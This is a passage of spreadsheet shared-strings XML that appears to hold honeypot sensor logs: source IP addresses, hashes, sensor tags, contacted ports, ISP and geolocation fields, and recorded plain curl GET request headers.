    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;56942&amp;&amp;80&amp;&amp;48367&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:3b7e:7716</t>
  </si>
  <si>
    <t>b57accf81e15ce962350d310d9ab5fb6</t>
  </si>
  <si>
    <t>106.215.159.10</t>
  </si>
  <si>
    <t>::ffff:6ad7:9f0a</t>
  </si>
  <si>
    <t>bc922b276c2127eb4d58e4f0ced06cb1</t>
  </si>
  <si>
    <t>114.33.38.40</t>
  </si>
  <si>
    <t>114-33-38-40.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_DNS_H36&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44</t>
  </si>
  <si>
    <t>80&amp;&amp;53&amp;&amp;30451&amp;&amp;23&amp;&amp;9100&amp;&amp;5554</t>
  </si>
  <si>
    <t>24.1469</t>
  </si>
  <si>
    <t>120.684</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7221:2628</t>
  </si>
  <si>
    <t>a8a552501a87f8c75e423f28f249c274</t>
  </si>
  <si>
    <t>182.56.33.169</t>
  </si>
  <si>
    <t>::ffff:b638:21a9</t>
  </si>
  <si>
    <t>5000f8b17823db5ab42a38da06509203</t>
  </si>
  <si>
    <t>125.228.28.243</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-28-243.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;23&amp;&amp;58370&amp;&amp;58381&amp;&amp;59628&amp;&amp;12652&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:1cf3</t>
  </si>
  <si>
    <t>040779373f7f3d019e996a923279e16d</t>
  </si>
  <si>
    <t>45.233.77.49</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H38</t>
  </si>
  <si>
    <t>23&amp;&amp;29945</t>
  </si>
  <si>
    <t>Seropédica</t>
  </si>
  <si>
    <t>Universidade Rural</t>
  </si>
  <si>
    <t>3480652</t>
  </si>
  <si>
    <t>-22.7664</t>
  </si>
  <si>
    <t>-43.6914</t>
  </si>
  <si>
    <t>267296</t>
  </si>
  <si>
    <t>Lopez Santos Sat Nit Telecomunicacoes LTDA</t>
  </si>
  <si>
    <t>::ffff:2de9:4d31</t>
  </si>
  <si>
    <t>ef5f9763d1987c3a6b47deeb5b2e9f6f</t>
  </si>
  <si>
    <t>117.207.161.23</t>
  </si>
  <si>
    <t>::ffff:75cf:a117</t>
  </si>
  <si>
    <t>573db15294d339e00a61e812ec5735b5</t>
  </si>
  <si>
    <t>37.252.79.24</t>
  </si>
  <si>
    <t>Yerevan (Kentron District)</t>
  </si>
  <si>
    <t>40.1772</t>
  </si>
  <si>
    <t>44.526</t>
  </si>
  <si>
    <t>44395</t>
  </si>
  <si>
    <t>Ucom CJSC</t>
  </si>
  <si>
    <t>Ucom Gpon</t>
  </si>
  <si>
    <t>::ffff:25fc:4f18</t>
  </si>
  <si>
    <t>3e8861077f5887b47267f9131f68647d</t>
  </si>
  <si>
    <t>220.133.175.72</t>
  </si>
  <si>
    <t>220-133-175-72.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>23&amp;&amp;49019&amp;&amp;31880&amp;&amp;48997&amp;&amp;4803&amp;&amp;36390&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc85:af48</t>
  </si>
  <si>
    <t>8f954c2992088f2d4012ea1cb434036f</t>
  </si>
  <si>
    <t>103.10.71.51</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>IDNIC-WBS-ID</t>
  </si>
  <si>
    <t>::ffff:670a:4733</t>
  </si>
  <si>
    <t>d2989cf7f6e0bd0bd8f85bc9c95f5b8d</t>
  </si>
  <si>
    <t>123.205.121.86</t>
  </si>
  <si>
    <t>123-205-121-86.adsl.dynamic.seed.net.tw&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_DNS_H21&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H6</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;47416&amp;&amp;80&amp;&amp;42438&amp;&amp;42461&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>2006-12-28</t>
  </si>
  <si>
    <t>::ffff:7bcd:7956</t>
  </si>
  <si>
    <t>c4574403bd0ad58d322260837f365216</t>
  </si>
  <si>
    <t>114.33.143.114</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-143-114.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>::ffff:7221:8f72</t>
  </si>
  <si>
    <t>906a64c8d4f7fcf781c1d322133a9de8</t>
  </si>
  <si>
    <t>117.242.233.113</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>31779&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75f2:e971</t>
  </si>
  <si>
    <t>4b48d6f56c9154ddd63f870f2105313e</t>
  </si>
  <si>
    <t>122.117.104.99</t>
  </si>
  <si>
    <t>122-117-104-99.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3296&amp;&amp;23&amp;&amp;7613&amp;&amp;2931&amp;&amp;NA&amp;&amp;47438&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7a75:6863</t>
  </si>
  <si>
    <t>88f881af4c2055b5535f390f0d47b277</t>
  </si>
  <si>
    <t>59.127.42.239</t>
  </si>
  <si>
    <t>59-127-42-239.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H21</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;64012&amp;&amp;80&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7f:2aef</t>
  </si>
  <si>
    <t>f53d36773ee12b8460fc5705fdc371ea</t>
  </si>
  <si>
    <t>220.133.177.156</t>
  </si>
  <si>
    <t>220-133-177-156.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H6&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;34624&amp;&amp;23&amp;&amp;11114&amp;&amp;40757&amp;&amp;80&amp;&amp;53727&amp;&amp;53712&amp;&amp;NA&amp;&amp;9100&amp;&amp;36265</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc85:b19c</t>
  </si>
  <si>
    <t>00de98822898c1fc1910a735dfe5331c</t>
  </si>
  <si>
    <t>59.126.194.111</t>
  </si>
  <si>
    <t>59-126-194-111.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;389&amp;&amp;45992&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:c26f</t>
  </si>
  <si>
    <t>3585135dcba94ffaa8e2cd2ec07e05f5</t>
  </si>
  <si>
    <t>121.7.118.22</t>
  </si>
  <si>
    <t>bb121-7-118-22.singnet.com.sg</t>
  </si>
  <si>
    <t>SINGTEL-FIBRE</t>
  </si>
  <si>
    <t>::ffff:7907:7616</t>
  </si>
  <si>
    <t>8b13bb0c274fe3611b98984543905d63</t>
  </si>
  <si>
    <t>125.229.44.63</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-229-44-63.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:2c3f</t>
  </si>
  <si>
    <t>8883acede3ec04cd5670be356b940ed1</t>
  </si>
  <si>
    <t>117.205.152.186</t>
  </si>
  <si>
    <t>::ffff:75cd:98ba</t>
  </si>
  <si>
    <t>5d5b59baa5a44be0de055255f0349aa0</t>
  </si>
  <si>
    <t>49.213.226.204</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H31&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;8878&amp;&amp;23&amp;&amp;13705&amp;&amp;51140&amp;&amp;36070&amp;&amp;NA&amp;&amp;80&amp;&amp;9100&amp;&amp;48711</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:31d5:e2cc</t>
  </si>
  <si>
    <t>2470f320f82ae19956329ec9e195e38f</t>
  </si>
  <si>
    <t>114.35.9.14</t>
  </si>
  <si>
    <t>114-35-9-14.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H31&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;12328&amp;&amp;80&amp;&amp;23&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7223:90e</t>
  </si>
  <si>
    <t>1947b195832d19e6c67af849d29bd12a</t>
  </si>
  <si>
    <t>59.93.124.241</t>
  </si>
  <si>
    <t>::ffff:3b5d:7cf1</t>
  </si>
  <si>
    <t>217b80eacf9ae7bff98a51176982fca9</t>
  </si>
  <si>
    <t>129.126.207.65</t>
  </si>
  <si>
